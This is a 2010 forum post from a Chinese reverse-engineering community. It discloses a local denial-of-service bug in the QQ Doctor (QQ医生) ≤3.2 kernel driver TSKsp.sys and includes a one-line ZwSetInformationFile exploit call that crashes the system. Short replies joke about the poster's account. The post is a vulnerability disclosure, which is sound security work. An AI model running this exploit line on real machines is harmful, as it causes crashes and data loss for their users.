首页
课程
问答
CTF
社区
招聘
看雪峰会
发现
排行榜
知识库
工具下载
看雪20年
看雪商城
证书查询
登录
注册
首页
社区
课程
招聘
发现
问答
CTF
排行榜
知识库
工具下载
看雪峰会
看雪商城
证书查询
社区
编程技术
发新帖
1
7
[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞
发表于: 2010-2-19 14:36
6166
[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞
zhenzero
2010-2-19 14:36
6166
影响版本:
QQ医生 <= 3.2
发布时间:2010-02-19
漏洞描述:
QQ医生是腾讯公司开发的一个安全辅助工具,其用于实现注册表文件拦截等功能的驱动程序TSKsp.sys没有对ZwSetInformationFile->FileDispostionInformation的参数做任何的检查就直接访问,因此攻击者可构造特殊的参数,使系统蓝屏
利用代码:
ZwSetInformationFile(0 , 0 ,0x80000000 , 0 , FileDispostionInformation );
安装了QQ医生的机器上运行上面一行代码,系统即告蓝屏
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
收藏
・
1
免费
・
7
支持
分享
分享到微信
分享到QQ
分享到微博
赞赏记录
参与人
雪币
留言
时间
Youlor
为你点赞~
2024-5-29 01:00
伟叔叔
为你点赞~
2024-1-15 03:00
QinBeast
为你点赞~
2024-1-9 05:55
shinratensei
为你点赞~
2024-1-3 02:32
一笑人间万事
为你点赞~
2023-12-10 01:00
心游尘世外
为你点赞~
2023-11-27 00:11
飘零丶
为你点赞~
2023-11-16 01:09
查看更多
赞赏
×
1 雪花
5 雪花
10 雪花
20 雪花
50 雪花
80 雪花
100 雪花
150 雪花
200 雪花
支付方式:
微信支付
赞赏留言:
快捷留言
感谢分享~
精品文章~
原创内容~
精彩转帖~
助人为乐~
最新回复
(
3
)
achillis
雪 币:
7651
活跃值:
(523)
能力值:
( LV9,RANK:610 )
在线值:
发帖
32
回帖
2032
粉丝
47
关注
私信
achillis
15
2
楼
楼主是新人还是马甲~~
2010-2-19 19:14
0
xiilin
雪 币:
401
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
35
回帖
792
粉丝
0
关注
私信
xiilin
3
楼
看起来像新人,呵呵,比我旧一些的那种。
2010-2-19 20:18
0
WHO-AM-I
雪 币:
210
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
1
回帖
67
粉丝
1
关注
私信
WHO-AM-I
4
楼
可能是马甲,我比还老!
2010-2-22 10:15
0
游客
登录
|
注册
方可回帖
回帖
表情
雪币赚取及消费
高级回复
返回
zhenzero
2
发帖
24
回帖
10
RANK
关注
私信
他的文章
[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞
6285
[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞
6167
关于我们
联系我们
企业服务
看雪公众号
专注于PC、移动、智能设备安全研究及逆向工程的开发者社区
看原图
赞赏
×
雪币:
+
留言:
快捷留言
返回
顶部